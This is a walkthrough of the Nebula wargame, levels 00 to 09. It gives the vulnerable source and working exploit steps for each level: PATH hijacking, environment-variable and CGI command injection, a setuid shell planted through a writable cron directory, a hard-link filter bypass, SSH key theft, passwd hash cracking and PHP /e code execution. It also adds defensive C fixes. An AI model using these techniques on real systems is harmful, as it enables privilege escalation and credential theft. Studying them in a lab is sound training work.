Level00

About

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

To access this level, log in as level00 with the password of level00.

Source code

There is no source code available for this level

Solution

Look for files with the setuid bit set that are owned by flag00.

$ find / -perm /u+s -user flag00 2> /dev/null
/bin/.../flag00
/rofs/bin/.../flag00

Level01

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Source code

(level1.c)

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char** argv, char** envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

Solution

The program runs echo through /usr/bin/env, which resolves the command via the caller's environment (PATH), and the caller controls that environment.

Create the file /home/level01/echo with the following contents:

#!/bin/sh
sh

Then make it executable and put its directory first in PATH:

$ chmod u+x /home/level01/echo
$ export PATH=/home/level01:$PATH

Level02

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

Source code

(level2.c)

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

Solution

The program writes the USER environment variable straight into the command string, so it is vulnerable to command injection.

$ export USER=\;sh\;
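As an added example (not code from Nebula or this walkthrough), here is how the pattern shared by level01 and level02 is fixed: the untrusted value ($USER here) is checked against a strict allowlist and the helper is executed by absolute path through execve() with a fixed environment, so neither PATH nor the string is ever parsed by a shell. The same two rules apply to level07's Host parameter. username_ok and run_echo are this example's own names.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Allowlist for an account name: 1..32 chars of [A-Za-z0-9_-], not starting
 * with '-' (so echo cannot take it as an option). None of these are shell
 * metacharacters, so level02's ";sh;" is rejected outright. */
int username_ok(const char *s)
{
    size_t n = s ? strlen(s) : 0;
    if (n == 0 || n > 32 || s[0] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        char c = s[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Run "/bin/echo <user> is cool" with no shell and no inherited environment,
 * which also closes level01's PATH trick. Returns the child's exit status,
 * or -1 if the name was rejected or the child could not be started. */
int run_echo(const char *user)
{
    if (!username_ok(user)) return -1;
    char *const argv[] = { "/bin/echo", (char *)user, "is", "cool", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };   /* fixed, minimal */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);   /* absolute path: PATH is never consulted */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* The setresgid/setresuid privilege drop of the originals would go here. */
    const char *user = getenv("USER");
    if (run_echo(user ? user : "") != 0)
        fprintf(stderr, "refused: USER is not a plain account name\n");
    return 0;
}
```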

Level03

About

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

Source code

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

Solution

The script runs every file in the writable.d directory, and that directory is writable by us, so we can simply drop a command in.

Create getsh.c:

#define _GNU_SOURCE     /* needed for setresuid() */
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
    /* Adopt the effective (setuid) uid as the real uid before spawning the shell. */
    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    system("/bin/sh");
    return 0;
}

$ gcc getsh.c -o /tmp/getsh
$ chmod +x /tmp/getsh

Create cmd.sh:

cp /tmp/getsh ~/getsh
chmod +s ~/getsh

$ mv cmd.sh /home/flag03/writable.d/
$ sleep 180; /home/flag03/getsh
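As an added example (not part of Nebula), the ownership and permission check the level03 cron job is missing, written in C so it can sit in a wrapper that the job calls: a dropped file is executed only when both it and its directory are owned by the job's account and writable by nobody else. trusted_node, safe_to_run and demo_writable_dropdir are this example's names, and the self-check uses constructed files under /tmp.

```c
#define _GNU_SOURCE            /* lstat() declaration */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* 1 if `path` is a regular file (or a directory when want_dir) owned by
 * `owner` and writable only by that owner. lstat() so a symlink dropped into
 * the directory is refused rather than followed. */
static int trusted_node(const char *path, uid_t owner, int want_dir)
{
    struct stat st;
    if (lstat(path, &st) != 0 || st.st_uid != owner) return 0;
    if (want_dir ? !S_ISDIR(st.st_mode) : !S_ISREG(st.st_mode)) return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* A job running as `owner` may execute `path` only if the file and its
 * containing directory are both trusted; level03's writable.d fails the latter. */
int safe_to_run(const char *path, uid_t owner)
{
    char dir[4096];
    const char *slash = strrchr(path, '/');
    if (!slash || (size_t)(slash - path) >= sizeof dir) return 0;
    memcpy(dir, path, (size_t)(slash - path));
    dir[slash - path] = '\0';
    if (!dir[0]) strcpy(dir, "/");
    return trusted_node(dir, owner, 1) && trusted_node(path, owner, 0);
}

/* Self-check on constructed paths under /tmp (not Nebula's files): returns 1
 * if a private dir/file is accepted, refused once the directory becomes
 * world-writable, and refused for a different expected owner. */
int demo_writable_dropdir(void)
{
    char dir[64], file[80];
    snprintf(dir, sizeof dir, "/tmp/writable.d-%ld", (long)getpid());
    snprintf(file, sizeof file, "%s/cmd.sh", dir);
    if (mkdir(dir, 0700) != 0) return -1;
    FILE *f = fopen(file, "w");
    if (!f) { rmdir(dir); return -1; }
    fputs("echo hi\n", f); fclose(f);
    if (chmod(file, 0644) != 0) return -1;
    int accepted = safe_to_run(file, getuid());
    if (chmod(dir, 0777) != 0) return -1;          /* the level03 mistake */
    int refused = !safe_to_run(file, getuid());
    int wrong_owner = !safe_to_run(file, getuid() + 1);
    unlink(file); rmdir(dir);
    return accepted && refused && wrong_owner;
}
```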

Level04

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

Source code

(level4.c)

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

Solution

The filename is filtered, so bypass the filter with a link; either a symbolic link or a hard link works.

$ ln /home/flag04/token ./too
$ /home/flag04/flag04 ~/too
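As an added example (not Nebula's code), the check level04 should have made: a substring test on the name cannot protect a file, because a hard link or symlink reaches the same inode under another name. The fix is to fstat() the file actually opened and compare device and inode with the protected file, and to refuse symlinks with O_NOFOLLOW. name_filter_blocks, fd_is_protected, open_checked and demo_hardlink_bypass are this example's names; the self-check builds its own files under /tmp.

```c
#define _GNU_SOURCE            /* O_NOFOLLOW and the stat-family declarations */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* level04's name-based check: "ln token too" gives the same inode a name that passes. */
int name_filter_blocks(const char *path) { return strstr(path, "token") != NULL; }

/* Identity check on the file actually opened: 1 if fd refers to the same
 * inode as protected_path (same st_dev and st_ino), 0 if not, -1 on error. */
int fd_is_protected(int fd, const char *protected_path)
{
    struct stat opened, prot;
    if (fstat(fd, &opened) != 0 || stat(protected_path, &prot) != 0) return -1;
    return opened.st_dev == prot.st_dev && opened.st_ino == prot.st_ino;
}

/* Open for reading, refusing symlinks (O_NOFOLLOW) and any name, hard link
 * included, that resolves to the protected inode. Returns the fd or -1. */
int open_checked(const char *path, const char *protected_path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd == -1) return -1;
    if (fd_is_protected(fd, protected_path) != 0) {   /* same inode, or error */
        close(fd);
        return -1;
    }
    return fd;
}

/* Self-check on constructed files under /tmp (not Nebula's token): the name
 * filter passes the hard link but the identity check refuses it. Returns 1
 * when both hold, -1 if the files could not be created. */
int demo_hardlink_bypass(void)
{
    char secret[64], alias[64];
    snprintf(secret, sizeof secret, "/tmp/token.%ld", (long)getpid());
    snprintf(alias, sizeof alias, "/tmp/too.%ld", (long)getpid());
    int fd = open(secret, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd == -1) return -1;
    int ok = write(fd, "secret\n", 7) == 7;
    close(fd);
    if (!ok || link(secret, alias) != 0) { unlink(secret); return -1; }
    int slipped_name = !name_filter_blocks(alias) && name_filter_blocks(secret);
    int refused = open_checked(alias, secret) == -1;
    unlink(alias); unlink(secret);
    return slipped_name && refused;
}
```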

Level05

About

Check the flag05 home directory. You are looking for weak directory permissions

To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Source code

There is no source code available for this level

Solution

$ ll /home/flag05
drwxr-x--- 1 flag05 level05   80 2016-07-13 01:12 ./
drwxr-xr-x 1 root   root     180 2012-08-27 07:18 ../
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup/
-rw------- 1 flag05 flag05    13 2016-07-13 01:12 .bash_history
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05    60 2016-07-13 01:11 .cache/
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh/
$ ll /home/flag05/.backup
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 ./
drwxr-x--- 1 flag05 level05   80 2016-07-13 01:12 ../
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

So the ssh backup is readable. Copy it into our home directory, extract it and log in with ssh.

$ cp /home/flag05/.backup/backup-19072011.tgz ./
$ tar zxvf backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

With the private key in place you can ssh in:

$ ssh flag05@localhost

Level06

About

The flag06 account credentials came from a legacy unix system.

To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Source code

There is no source code available for this level

Solution

$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

The password hash in /etc/passwd is readable and uses a weak, crackable hash, so crack it with john. Save the flag06 line to a file called passwd, run john on it, then show the result:

root@kali:~# john --show passwd
flag06:hello:993:993::/home/flag06:/bin/sh

1 password hash cracked, 0 left

john (John the Ripper) is a tool for finding weak passwords on Linux.


Level07

About

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

Source code

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

Solution

The $host parameter is interpolated unescaped into a shell command, so it is vulnerable to command injection.

level07@nebula:~$ cat ../flag07/thttpd.conf | grep port=
port=7007
level07@nebula:~$ wget -qO- 'localhost:7007/index.cgi' --post-data=\
> `php -r "echo 'Host='.urlencode(';cp /tmp/getsh ~/;chmod +s ~/getsh');"`

Level08

About

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

Source code

There is no source code available for this level

Solution

$ tcpflow -c -r capture.pcap

In the tcpflow output the password appears as backdoor...00Rm8.ate, but that is not quite right.

import scapy.all as scapy

# Walk the capture and dump the TCP payload of every packet that carries one.
for p in scapy.rdpcap('capture.pcap'):
    if p.haslayer(scapy.Raw):
        p[scapy.Raw].show()

With Python you can see that each . in the password is actually \x7f, the ASCII DEL (backspace) character, so the password is backd00Rmate.
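As an added example (not one of the walkthrough's scripts), the same reconstruction done in C: the client-to-server bytes contain 0x7f wherever the user pressed backspace, tcpflow prints those as '.', and replaying the line editing yields the string that was actually submitted. The byte string is constructed here to match what the page describes rather than read from capture.pcap; apply_line_editing and recover_password are this example's own names.

```c
#include <stdio.h>
#include <string.h>

/* Replay terminal line editing over raw keystrokes: DEL (0x7f, what this
 * client sent for backspace) and BS (0x08) erase the previous character;
 * CR or LF ends the line. Returns the length written to out. */
size_t apply_line_editing(const unsigned char *in, size_t n, char *out, size_t cap)
{
    size_t len = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = in[i];
        if (c == 0x7f || c == 0x08) { if (len) len--; continue; }
        if (c == '\r' || c == '\n') break;
        if (len + 1 < cap) out[len++] = (char)c;
    }
    out[len] = '\0';
    return len;
}

/* Constructed sample of the client->server bytes, matching what the page
 * describes: "backdoor", three DELs, "00Rm8", one DEL, "ate", Enter.
 * Split into adjacent literals so "\x7f0" is not read as one hex escape. */
static const unsigned char SAMPLE[] = "backdoor\x7f\x7f\x7f" "00Rm8\x7f" "ate\r";

/* What the user actually ended up submitting. */
const char *recover_password(void)
{
    static char buf[64];
    apply_line_editing(SAMPLE, sizeof SAMPLE - 1, buf, sizeof buf);
    return buf;
}

int main(void)
{
    /* First line: how a dot-for-nonprintable viewer such as tcpflow shows the bytes. */
    printf("as displayed : ");
    for (size_t i = 0; i < sizeof SAMPLE - 1; i++)
        putchar(SAMPLE[i] >= 0x20 && SAMPLE[i] < 0x7f ? SAMPLE[i] : '.');
    printf("\nreconstructed: %s\n", recover_password());
    return 0;
}
```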


Level09

About

There’s a C setuid wrapper for some vulnerable PHP code…

To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.

Source code

<?php

function spam($email)
{
  $email = preg_replace("/\./", " dot ", $email);
  $email = preg_replace("/@/", " AT ", $email);
  
  return $email;
}

function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);

  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
  $contents = preg_replace("/\[/", "<", $contents);
  $contents = preg_replace("/\]/", ">", $contents);

  return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?>

Solution

preg_replace is called with the deprecated, unsafe /e modifier, which evaluates the replacement string as PHP code; the $use_me argument can therefore be used for command injection.

$ echo "[email {\${print(\`\$use_me\`)}}]" > /tmp/test
$ ./flag09 /tmp/test "cp /tmp/getsh /home/flag09/"
$ ./flag09 /tmp/test "chmod +s /home/flag09/getsh"